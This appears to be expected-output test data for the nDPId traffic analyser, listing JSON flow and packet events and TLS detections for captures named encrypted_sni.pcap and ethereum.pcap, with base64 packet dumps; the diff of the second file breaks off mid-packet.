00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"encrypted_sni.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680387847,"flow_last_seen":1590680387847,"flow_idle_time":7440000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680387847,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.16.125.175","src_port":49887,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
01426{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"encrypted_sni.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1590680387847,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":770,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":770,"pkt_l4_len":736,"thread_ts_msec":1590680387847,"pkt":"EBMx8Tl2KDc3AG3ICABFAAL0AABAAEAGkJDAqAEMaBB9r8LfAbu98X4VZuCG7lAYIACqfgAAFgMBAscBAALDAwPZvt6xqK7JiSO2eRBioUk2Uu867QdPWpn6Sv4hYS472iAz8c+AKNafKEsBeorsjdYMXk2HdHvKJL23Af8gga\/qxAAkEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAMwA5AC8ANQAKAQACVgAXAAD\/AQABAAAKAA4ADAAdABcAGAAZAQABAQALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAAMwBrAGkAHQAg0HCVKAanlLS9J1B8hdchDfkoKDxcPc3B5hBZYsZWdz8AFwBBBCakAur\/e3rF+tGl0au7NOTY4DQpBg\/YjV6ew74w8otvaCGiCdoeWGhEGjsldqwZrBxN3o59i8BSdRX+YPQ+GgkAKwAJCAMEAwMDAgMBAA0AGAAWBAMFAwYDCAQIBQgGBAEFAQYBAgMCAQAtAAIBAf\/OAW4TAQAdACAFyK2kXV21yqtAW2T62b\/NDTnJgxOrhECle3qcjynhZQAgHyQSymUyoBaYNvGbjOJlOzPcW4r7yiRdTxErCb+vUsgBJLkAAE456EuY9a6HsKAg7En+2G8rSItqsoven5V2IfJ3Q2bekOZcTKgIZokRYkaF7ExtxsFhqXy+gigbwIQnaXqjvmpA5fAKz4tj4ykxew5OhWQtUKuHkOYZfaYtn1syOdzFlDd5f+dopSDJ1HH+q6E3XfYeSjmwk2PLEJ57JKeThEiW3dFrbufb5XbXZxYdeC179v7EU6Bakj2Njpvv\/Jfo5WxPGqtw\/pm8l4GeHZCKXzswlPS\/Jet6JKlP28PhB6QjuLs0HyKQD3u9h3gOMLbs85P+uPv\/61THn6BnP+Gq0XsiHUv\/ZFCqDNSvUTBmtmCAtgIUfzrLcUWkNsVonaILrLi\/m6vYUQElVuyPe7nXS\/qvJdz0NipXdWB8POXCwp8YOWkAHAACQAE="}
00901{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"encrypted_sni.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680387847,"flow_last_seen":1590680387847,"flow_idle_time":7440000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680387847,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.16.125.175","src_port":49887,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"957015a0b1e2500d8777219893a09495","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"encrypted_sni.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680391590,"flow_last_seen":1590680391590,"flow_idle_time":7440000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680391590,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.22.71.197","src_port":49897,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
01420{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"encrypted_sni.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1590680391590,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":770,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":770,"pkt_l4_len":736,"thread_ts_msec":1590680391590,"pkt":"EBMx8Tl2KDc3AG3ICABFAAL0AABAAEAGxnTAqAEMaBZHxcLpAbsLJg40SW6gUlAYIAANXgAAFgMBAscBAALDAwMJLl9l\/OldUJYbpqd0xOpts3Kv4zg2hroTXcdX9KeB2CBjkfBVUTqX532YPuVZHQd0J5lIK2OZH9nsSRBnWwKDWwAkEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAMwA5AC8ANQAKAQACVgAXAAD\/AQABAAAKAA4ADAAdABcAGAAZAQABAQALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAAMwBrAGkAHQAgsbxhJX9IcnjB7rdgEb2YIBohnnxEhKIToNk1er8CIioAFwBBBLtlLNXLCuP0okhISXwuyj6tgeyLGZ5yaSZ9uT3zAbum2y5l1gYjS6RGBBL9dNcuY2pA4Ze582sOuuo0cAvw2TsAKwAJCAMEAwMDAgMBAA0AGAAWBAMFAwYDCAQIBQgGBAEFAQYBAgMCAQAtAAIBAf\/OAW4TAQAdACCgcq\/jSZGFwhXJHl9nfU84W9RHblecX+XHXi+knd++egAgHyQSymUyoBaYNvGbjOJlOzPcW4r7yiRdTxErCb+vUsgBJM1prHJ\/+qDqcKEqpG5xU365kjS5loGMkTxyoKwRhL+l3TthfgE+TKCSsunPt4vNjTPLrxKpdN+3jkm4v5pXmXQY7xTIeDCWHjyEgNKkvyfWHZEc70MAkkqfNhBXSLrthF\/1heQEBlRbs1xtqteJZDPsTf1rb0lyjahdcH23rHhPVaZljcat4wh7Hka7vt+kTz6HVLMaa8+FGdKR02KYBfqCbkN5nqbjMCHPCoPKBXF7APN9aYQZNPW1vyVMZGeIilksOKMAfbO31cu423QrZX+PlzwFC6qBeqVxOTzYpLwLIxJGCnfdBRD0u85D1TvPM05OjHVwJVu9F3FEA\/S2klQ0zWf5b6ngXXAHdoEO61eGscgYik1z+CCLYUuTKEqAk5KVlL4AHAACQAE="}
00900{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"encrypted_sni.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680391590,"flow_last_seen":1590680391590,"flow_idle_time":7440000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680391590,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.22.71.197","src_port":49897,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"957015a0b1e2500d8777219893a09495","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3,"source":"encrypted_sni.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680386576,"flow_last_seen":1590680386576,"flow_idle_time":7440000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680391590,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.27.129.77","src_port":49886,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3,"source":"encrypted_sni.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680391590,"flow_last_seen":1590680391590,"flow_idle_time":7440000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680391590,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.22.71.197","src_port":49897,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3,"source":"encrypted_sni.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680387847,"flow_last_seen":1590680387847,"flow_idle_time":7440000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680391590,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.16.125.175","src_port":49887,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"encrypted_sni.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680386576,"flow_last_seen":1590680386576,"flow_idle_time":7560000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680386576,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.27.129.77","src_port":49886,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
01422{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"encrypted_sni.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1590680386576,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":770,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":770,"pkt_l4_len":736,"thread_ts_msec":1590680386576,"pkt":"EBMx8Tl2KDc3AG3ICABFAAL0AABAAEAGjOfAqAEMaBuBTcLeAbt3Q5LX\/48DFVAYIACwHgAAFgMBAscBAALDAwOTwM86TEdZaYZx77QiKeLaOUyI6FPS+J3L+0S3MA31OCDtrXy2AkmiC5EC8aXH8NKs5TG5ofTGvlsmIWUcTFlOhgAkEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAMwA5AC8ANQAKAQACVgAXAAD\/AQABAAAKAA4ADAAdABcAGAAZAQABAQALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAAMwBrAGkAHQAg9C+VXLX0pUAYcvwRMlm2BfjMFL+A2Ha+teHeYm8XszAAFwBBBKhP+5j\/iIqKULsVEv1xkLdgIoxwczB5EVKfTq\/0aLaIOqqUx255GoGIKzaHGdYeWvgG2FTscntynOjMKiH+1xMAKwAJCAMEAwMDAgMBAA0AGAAWBAMFAwYDCAQIBQgGBAEFAQYBAgMCAQAtAAIBAf\/OAW4TAQAdACAoJey8d6KdccaSJO2lCYt20kw0EEYFyldVNE\/b+wVlLQAgHyQSymUyoBaYNvGbjOJlOzPcW4r7yiRdTxErCb+vUsgBJJYkyzxOIwgn94z1v2QNIt6jP8xZjqajLZOZBVhvvpl7nmhmH4lW1IkwcuGd4kzR+4ip9x\/EzAG6tckU\/flqZH1nG16JhZuu6rEiIYaISW303wwyjD1flAsQnOsqJ0PVy+NZQoiiKbjH4viDA+P+GiaonlAB8r2TaJD+948G4F7MBjpovbjBjfrBFM8f7NuL4fwv7ssjFdJ5mNaCsSn9Hj6115hdy9xFKhCCzMA44L9pVw\/vrGvG+5UfibZ5LK2nZAPALOtdzhzm7d0W1ff7a4XSuSSFRI3gCI5CHoPx4osmf747Wa4ElvuEUhPCcdTFrF6efl9qMHJEUwf8zrcwZxBFmZHEDMTcH8MlFUx5dN14A3E5eAVFahmuI+6IR1wd8HaXtmYAHAACQAE="}
00900{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"encrypted_sni.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680386576,"flow_last_seen":1590680386576,"flow_idle_time":7560000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680386576,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.27.129.77","src_port":49886,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"957015a0b1e2500d8777219893a09495","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"encrypted_sni.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680387847,"flow_last_seen":1590680387847,"flow_idle_time":7560000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680387847,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.16.125.175","src_port":49887,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
01426{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"encrypted_sni.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1590680387847,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":770,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":770,"pkt_l4_len":736,"thread_ts_msec":1590680387847,"pkt":"EBMx8Tl2KDc3AG3ICABFAAL0AABAAEAGkJDAqAEMaBB9r8LfAbu98X4VZuCG7lAYIACqfgAAFgMBAscBAALDAwPZvt6xqK7JiSO2eRBioUk2Uu867QdPWpn6Sv4hYS472iAz8c+AKNafKEsBeorsjdYMXk2HdHvKJL23Af8gga\/qxAAkEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAMwA5AC8ANQAKAQACVgAXAAD\/AQABAAAKAA4ADAAdABcAGAAZAQABAQALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAAMwBrAGkAHQAg0HCVKAanlLS9J1B8hdchDfkoKDxcPc3B5hBZYsZWdz8AFwBBBCakAur\/e3rF+tGl0au7NOTY4DQpBg\/YjV6ew74w8otvaCGiCdoeWGhEGjsldqwZrBxN3o59i8BSdRX+YPQ+GgkAKwAJCAMEAwMDAgMBAA0AGAAWBAMFAwYDCAQIBQgGBAEFAQYBAgMCAQAtAAIBAf\/OAW4TAQAdACAFyK2kXV21yqtAW2T62b\/NDTnJgxOrhECle3qcjynhZQAgHyQSymUyoBaYNvGbjOJlOzPcW4r7yiRdTxErCb+vUsgBJLkAAE456EuY9a6HsKAg7En+2G8rSItqsoven5V2IfJ3Q2bekOZcTKgIZokRYkaF7ExtxsFhqXy+gigbwIQnaXqjvmpA5fAKz4tj4ykxew5OhWQtUKuHkOYZfaYtn1syOdzFlDd5f+dopSDJ1HH+q6E3XfYeSjmwk2PLEJ57JKeThEiW3dFrbufb5XbXZxYdeC179v7EU6Bakj2Njpvv\/Jfo5WxPGqtw\/pm8l4GeHZCKXzswlPS\/Jet6JKlP28PhB6QjuLs0HyKQD3u9h3gOMLbs85P+uPv\/61THn6BnP+Gq0XsiHUv\/ZFCqDNSvUTBmtmCAtgIUfzrLcUWkNsVonaILrLi\/m6vYUQElVuyPe7nXS\/qvJdz0NipXdWB8POXCwp8YOWkAHAACQAE="}
00901{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"encrypted_sni.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680387847,"flow_last_seen":1590680387847,"flow_idle_time":7560000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680387847,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.16.125.175","src_port":49887,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"957015a0b1e2500d8777219893a09495","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"encrypted_sni.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680391590,"flow_last_seen":1590680391590,"flow_idle_time":7560000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680391590,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.22.71.197","src_port":49897,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
01420{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"encrypted_sni.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1590680391590,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":770,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":770,"pkt_l4_len":736,"thread_ts_msec":1590680391590,"pkt":"EBMx8Tl2KDc3AG3ICABFAAL0AABAAEAGxnTAqAEMaBZHxcLpAbsLJg40SW6gUlAYIAANXgAAFgMBAscBAALDAwMJLl9l\/OldUJYbpqd0xOpts3Kv4zg2hroTXcdX9KeB2CBjkfBVUTqX532YPuVZHQd0J5lIK2OZH9nsSRBnWwKDWwAkEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAMwA5AC8ANQAKAQACVgAXAAD\/AQABAAAKAA4ADAAdABcAGAAZAQABAQALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAAMwBrAGkAHQAgsbxhJX9IcnjB7rdgEb2YIBohnnxEhKIToNk1er8CIioAFwBBBLtlLNXLCuP0okhISXwuyj6tgeyLGZ5yaSZ9uT3zAbum2y5l1gYjS6RGBBL9dNcuY2pA4Ze582sOuuo0cAvw2TsAKwAJCAMEAwMDAgMBAA0AGAAWBAMFAwYDCAQIBQgGBAEFAQYBAgMCAQAtAAIBAf\/OAW4TAQAdACCgcq\/jSZGFwhXJHl9nfU84W9RHblecX+XHXi+knd++egAgHyQSymUyoBaYNvGbjOJlOzPcW4r7yiRdTxErCb+vUsgBJM1prHJ\/+qDqcKEqpG5xU365kjS5loGMkTxyoKwRhL+l3TthfgE+TKCSsunPt4vNjTPLrxKpdN+3jkm4v5pXmXQY7xTIeDCWHjyEgNKkvyfWHZEc70MAkkqfNhBXSLrthF\/1heQEBlRbs1xtqteJZDPsTf1rb0lyjahdcH23rHhPVaZljcat4wh7Hka7vt+kTz6HVLMaa8+FGdKR02KYBfqCbkN5nqbjMCHPCoPKBXF7APN9aYQZNPW1vyVMZGeIilksOKMAfbO31cu423QrZX+PlzwFC6qBeqVxOTzYpLwLIxJGCnfdBRD0u85D1TvPM05OjHVwJVu9F3FEA\/S2klQ0zWf5b6ngXXAHdoEO61eGscgYik1z+CCLYUuTKEqAk5KVlL4AHAACQAE="}
00900{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"encrypted_sni.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680391590,"flow_last_seen":1590680391590,"flow_idle_time":7560000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680391590,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.22.71.197","src_port":49897,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"957015a0b1e2500d8777219893a09495","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3,"source":"encrypted_sni.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680386576,"flow_last_seen":1590680386576,"flow_idle_time":7560000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680391590,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.27.129.77","src_port":49886,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3,"source":"encrypted_sni.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680391590,"flow_last_seen":1590680391590,"flow_idle_time":7560000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680391590,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.22.71.197","src_port":49897,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3,"source":"encrypted_sni.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680387847,"flow_last_seen":1590680387847,"flow_idle_time":7560000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680391590,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.16.125.175","src_port":49887,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00556{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":3,"source":"encrypted_sni.pcap","alias":"nDPId-test","packets-captured":3,"packets-processed":3,"total-skipped-flows":0,"total-l4-data-len":2148,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":3,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":3,"total-idle-flows":3,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":15,"global_ts_msec":1590680391590}
~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
~~ packets captured/processed: 3/3

664
test/results/ethereum.pcap.out
View File

@@ -28,219 +28,219 @@
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1578508364422,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1578508364422,"pkt":"EBMx8Tl2KDc3AG3ICABFAADHAOAAAEAR3JLAqAG4NOelbHZfdl8As+U915lp9gBLtC6IaCW33is1Th50j8UHjOmT4mAffcZn+yYEl4jGBnLnkKaeXePCjndUh79\/WTQA2R4kNex3KmtFmldicE1yJNj24ZecPC4hxpTcI9qIeMXPlU0BU5Rec0LcAQP4R7hAggEUSZWpWZm0YK3HCqZiBR7sHJ3wp8USPzyX73HGoWVqts4UjRd8TfDxZuCIPe7jI\/CXMWJB7l7pTCCyfJvg8YReFiBg"}
01863{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1578508364519,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1097,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1097,"pkt_l4_len":1063,"thread_ts_msec":1578508364519,"pkt":"KDc3AG3IEBMx8Tl2CABFAAQ7F1RAAC8RPN4D0S1PwKgBuHZfdl8EJ4PVaVYTvO9LrTk6yni9j9O4lLCx8c3w2iOwFQRksfASVhzN6T8K7lnXRwHY7v3+ONhElGFbYOffjDytd02o206R62nDNZ+LcEa5V5K9KHZQh029ihE8Ury3mI0LZjHE13ZDAAT5A7r5A7L4S4QjtPapgnZdgLhAO5qC1ATimkffsyZlSJIXGVIuxdFsM86E7cqAjFOnv\/8DXNCQHJBVJiDXoCE+xGUbCBkPCreAagxpFk0Kv5X\/6PhNhKUWayGCdl+Cdl+4QFK2HHRAlM9Mj+TxGD7ACVRZHZtB58hxcD+hW2XdmacQwMOkGeflfz3iQaCGa6bw7UpxurZYH9DtQSW8Gn+wiV74TYRZJmMignZfgnZfuEBNXexB6IZur6GByNXF5kqBGoYoINyuPaRzRT\/L\/XeZwo80a\/N6vMBtsgrq2ZF9h4G0sqa47Wg7uKDWSZtY6p\/o+E2EsoDD3IJ2X4J2X7hAE9D206tRuSrRWszd5+5PqyxrzPQHPgJ6M4jR3YAwA4SXyWoQd9UmDUgHBtsrr3UYDBX+DpI9ijrH8jmNKWfim\/hNhKLzoFOCdl+Cdl+4QFcgAb+wxvXRoA\/jZ6pZpvtWMqWRnDTAVCrWET9xUm+STSO+d5OO9wGG7pHu9I5ueUw\/fAd5lu3NtaUH9uwTgQX4TYQSilEcgnZfgnZfuEDrOA+HQ7eWMjwlUeqXlrKvkuj1DTxVelkYAtV5dglpnIhrBZIeo034r7N3OARecEoNp0x6OeeY\/TD1OnJUir9u+E2EMyY8T4J2X4J2X7hAjvDxlr5M7BUzw40ony1SnzUKukEALVTn0B8WrIdd1Y\/HWL6mkTC4nsoMDegX1FF++rFMqjeViKJkeSDvzXh7sPhNhChDkICCdl+Cdl+4QHLmnbcNhaAJxQnuC0km5NBqC0yHT\/O8y7iwbqWb3zIi\/JNBIGOytm1SPyhBCVXEAh08vp59waAp0Fl3XZsLDpX4TYTH56bignZggnZguEAmai5v1neViV7teAsEvO\/IJYfemYLf2+j3ix3twO4cHaO8DDPa+4MSEcEzAFsUx\/2pmlUPII1TqUXgDk2+EYuF+E2EMyZRtIJ2X4J2X7hAgHT+RrAG20B8DB\/bHPvQKm79m+Z0+BB1fJpuHmieLdFavNthxznxmL2TjLC2hF17uhr9nJ8lRGk+kyETydUasfhNhFKR3PmCdl+Cdl+4QN1yRfRd+2g8MnNCa1j1Cnr1GFpxy7vxkYduQKQx1cGeo9xW0LFVTR4sISMRFqTJvP1+kBDeZDQ7++taiTPWLVf4TYSfy1QfgnZfgnZfuEATr9aMDwnYcu1Ru9AfCYxf1j4pIYv3iEkEPcprByn6GaZXC692Pg7aNtJE7Ibn2jkRlWjrNM1fsvjqm9oBENLzhF4WIGA="}
01006{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1578508364519,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":467,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":467,"pkt_l4_len":433,"thread_ts_msec":1578508364519,"pkt":"KDc3AG3IEBMx8Tl2CABFAAHFF1VAAC8RP1MD0S1PwKgBuHZfdl8BsTR2htDCYwB7bPwVHRrppzCkGewLkUUNlB3jVcwKSsPl3PpRPPiYpogGSbVhGO6LOf+6vpmiVjQKuGK9fr9HzQor5V9uX7UyvZMEj8wMYsgT45Bz2Z7bdsQaazyQJOYgw3sXAAT5AUT5ATz4TYSi5B2ggnZfgnZfuEAwVdpN68jOobX+wHrrL2RH\/wK1ka2szeSJGHiHFFoNLEPxKwxFy33NRZ3ovPOnkwdh3qJaARUyaYeXnrMHfiPL+E2EpERrUoJ2YYJ2YbhAbVK4hBOIFxjMK61hoo+B2E1DFAGWystZDApZ1qWqMdGzPO6EtDCq